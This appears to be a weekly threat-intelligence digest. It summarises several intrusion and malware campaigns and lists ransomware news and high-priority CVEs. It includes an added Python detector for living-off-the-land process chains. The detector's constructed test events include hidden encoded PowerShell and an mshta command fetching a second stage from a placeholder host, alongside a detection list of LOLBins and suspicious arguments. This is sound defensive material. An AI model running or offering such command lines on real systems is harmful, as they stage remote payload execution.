Operation Digital Eye targets IT service providers in Southern Europe via VSC tunnels
Between late June and mid-July 2024, SentinelLabs and Tinexta Cyber researchers observed a suspected China-nexus advanced persistent threat (APT) targeting large business-to-business IT service providers in Southern Europe. The activity, tracked as Operation Digital Eye, lasted three weeks and aimed to establish footholds in target networks and exert control over critical IT processes within the downstream compromised entities. The attackers used SQL injection to gain initial access, deployed a PHP-based webshell to establish a foothold and maintain persistence, conducted reconnaissance using third-party tools and built-in Windows utilities, and used the ‘CreateDump’ tool to steal credentials. The attackers then moved laterally across the internal network, primarily using Remote Desktop Protocol connections and pass-the-hash techniques, which involved the use of a custom version of Mimikatz.
Threat actors target manufacturing industry with Lumma Stealer and Amadey Bot
Cyble researchers identified a multi-stage campaign involving an LNK file disguised as a PDF file to target the manufacturing industry. The attack chain leverages DLL sideloading and IDATLoader to deploy the Lumma Stealer and Amadey Bot, enabling the attacker to gain control and exfiltrate sensitive information from the victim’s machine. While the initial infection vector is unknown, the attack likely begins with a spear phishing email prompting the recipient to click on a link that leads to an LNK shortcut file disguised as a PDF document. Once executed, the LNK file triggers a command to launch multiple living-off-the-land binaries, such as ssh, PowerShell, and mshta, to bypass security measures and remotely execute the next-stage payloads, Lumma and Amadey.
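The chain above (a user opens an LNK posing as a PDF, and a run of living-off-the-land binaries follows) is visible in process-creation telemetry as a sequence of LOLBins descending from the user's shell. The following is an added detection example written for this digest, not code from Cyble: it walks constructed Sysmon-style process-creation records, reconstructs parent/child chains, and reports chains of two or more LOLBins rooted at explorer.exe, while leaving a single interactive PowerShell console alone. The LOLBin list, the explorer.exe root, and the command-line indicator fragments are assumed heuristics of the example, not indicators from the report.

```python
"""Flag living-off-the-land process chains that start from the user's shell.
Added example for this digest; the events are constructed, not from the report."""
from dataclasses import dataclass

# Binaries named in the campaign summary plus cmd.exe as the usual LNK target (assumed set).
LOLBINS = {"cmd.exe", "ssh.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
USER_SHELLS = {"explorer.exe"}
# Command-line fragments that raise confidence (assumed heuristics).
SUSPICIOUS_ARGS = ("-w hidden", "-enc", "http://", "https://")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation records: one malicious chain, one benign console, one PDF reader.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c <constructed LNK target>"),
    ProcEvent(201, 200, r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe <constructed arguments>"),
    ProcEvent(202, 201, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc AAAA"),
    ProcEvent(203, 202, r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/stage2.hta"),
    ProcEvent(300, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    ProcEvent(400, 100, r"C:\Program Files\Reader\reader.exe", "reader.exe invoice.pdf"),
]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, whatever the separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def lolbin_chains(events, min_lolbins: int = 2):
    """Return maximal LOLBin chains (root to leaf) whose parent is a user shell."""
    by_pid = {e.pid: e for e in events}
    # PIDs that already have a LOLBin child: not the end of a chain, so skip them as leaves.
    has_lolbin_child = {e.ppid for e in events if image_name(e.image) in LOLBINS}
    findings = []
    for leaf in events:
        if image_name(leaf.image) not in LOLBINS or leaf.pid in has_lolbin_child:
            continue
        chain = [leaf]
        cur = leaf
        # Climb while the parent is itself a LOLBin.
        while cur.ppid in by_pid and image_name(by_pid[cur.ppid].image) in LOLBINS:
            cur = by_pid[cur.ppid]
            chain.append(cur)
        root = by_pid.get(cur.ppid)
        if root is None or image_name(root.image) not in USER_SHELLS:
            continue
        if len(chain) < min_lolbins:
            continue  # a lone console under explorer.exe is normal user activity
        chain.reverse()
        indicators = sorted({
            frag for e in chain for frag in SUSPICIOUS_ARGS if frag in e.cmdline.lower()
        })
        findings.append({
            "leaf_pid": leaf.pid,
            "chain": [image_name(e.image) for e in chain],
            "indicators": indicators,
        })
    return findings


if __name__ == "__main__":
    for finding in lolbin_chains(SAMPLE_EVENTS):
        print(finding)
```

Requiring two or more LOLBins between the shell and the leaf is what keeps a user's own PowerShell window out of the results; the indicator fragments are only attached to the finding, not used to gate it, so an attacker who drops `-enc` still produces an alert on chain shape alone.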
RedLine stealer campaign targets Russian businesses via pirated software
Kaspersky researchers observed an ongoing RedLine infostealer campaign, active since January 2024, targeting Russian businesses using pirated corporate software. The threat actors target business process automation users by distributing a malicious version of the HPDxLIB activator that uses a self-signed certificate. The activator contains RedLine stealer, which is obfuscated using .NET Reactor and contains malicious code that is compressed and encrypted in multiple layers. The threat actors distribute the malicious activators via specialised Russian business ownership and accounting forums, often providing instructions on disabling security software to run the activator. The attackers then trick users into replacing a legitimate DLL library with a malicious one included in the activator, which loads a malicious library and runs RedLine stealer.
IOCONTROL malware targets IoT and OT devices in Israel and the US
Claroty researchers detailed IOCONTROL, a custom-built internet of things (IoT) and operational technology (OT) malware used by Iran-affiliated threat actors to target Israel and United States-based IoT and OT devices. Devices affected by the malware include IP cameras, routers, PLCs, HMIs, firewalls, and more. Impacted vendors include Baicells, D-Link, and Hikvision, among others. The malware has most recently been used by CyberAv3ngers, which is believed to be part of the Islamic Revolutionary Guard Corps Cyber Electronic Command. One of their attack waves specifically targeted Orpak and Gasboy fuel management systems, resulting in the compromise of about 200 gas stations in Israel and the US.
Global phishing campaign targets multiple industries to steal login credentials
Since July 2024, Group-IB researchers observed an ongoing email phishing campaign targeting the employees and associates of more than 30 businesses and organisations from 15 jurisdictions worldwide. More than 200 phishing links have been distributed to the victims as part of a scheme designed to obtain their login credentials. Targeted industries include manufacturing, government sectors, aerospace, finance, energy, telecommunications, and fashion. The campaign begins with phishing links that mimic trusted platforms used for document management and electronic signatures, such as Adobe and DocuSign, and prompt the recipients to click on a link to view and sign a document. The embedded document pretends to deliver an important PDF message impersonating Adobe InDesign, but instead includes a link that redirects victims to a phishing page.
Ransomware
Volume of blog posts by operators during the last week.
Lynx ransomware behind Electrica energy supplier cyberattack (Bleeping Computer – Dec 11 2024)
12 Months of Ransomware – A Year in Review (Silobreaker Blog – Dec 11 2024)
Head Mare Targets Russian Orgs with Hidden LNK Files, Ransomware (The Cyber Express – Dec 11 2024)
Ransomware attack cripples Wood County computer systems (Toledo Blade – Dec 10 2024)
Dark Web Profile: Ymir Ransomware (SOCRadar – Dec 09 2024)
Is KillSec3 Trying to Extort Victims Using Publicly Leaked Data? (DataBreaches.net – Dec 08 2024)
A Technical Look At The New ‘Termite’ Ransomware That Hit Blue Yonder (Cyble Blog – Dec 06 2024)
Exploration of Parano – Multiple Hacking Tools’ Capabilities (CYFIRMA – Dec 04 2024)
Financial Services
The Rise of Pig Butchering Scams (Cyberint – Dec 11 2024)
AppLite: A New AntiDot Variant Targeting Mobile Employee Devices (Zimperium Blog – Dec 10 2024)
$50 Million Radiant Capital Heist Blamed on North Korean Hackers (SecurityWeek RSS Feed – Dec 10 2024)
Meeten Malware: A Cross-Platform Threat to Crypto Wallets on macOS and Windows (Cado Security – Dec 06 2024)
Ukrainian intelligence hackers disrupt Russia’s Gazprombank, source says (The Kyiv Independent – Dec 05 2024)
Geopolitics
Secret Blizzard Targets Ukrainian Military with Custom Malware (Infosecurity Today – Dec 11 2024)
CERT-UA Warns of Phishing Attacks Targeting Ukraine’s Defense and Security Force (The Hacker News – Dec 10 2024)
Romanian court annuls result of presidential election first round (BBC – Dec 06 2024)
Russian Hacktivists Increasingly Tamper with Energy and Water System Controls (Cyble – Dec 06 2024)
Microsoft: Another Chinese cyberspy crew targeting US critical orgs ‘as of yesterday’ (The Register – Security – Dec 06 2024)
High Priority Vulnerabilities
CVE | Software | Base Score | Temp Score | Related
---|---|---|---|---
CVE-2024-49138 | Windows | 7.8 | 7.5 | Microsoft Fixes 71 CVEs Including Actively Exploited Zero-Day
CVE-2024-50623 | LexiCom | 8.8 | 3.4 | Cleo Vulnerability Exploitation Linked to Termite Ransomware Group
CVE-2023-46604 | Enterprise Data Quality | 9.8 | 9.8 | Mauri Ransomware Leverages Apache ActiveMQ Vulnerability to Deploy CoinMiners
CVE-2024-50498 | WP Query Console Plugin | 9.8 | 7.1 | Critical flaw in Hunk Companion plugin exploited to install vulnerable plugins
CVE-2024-10905 | IdentityIQ | 10.0 | 9.4 | Maximum-severity flaw fixed in SailPoint IdentityIQ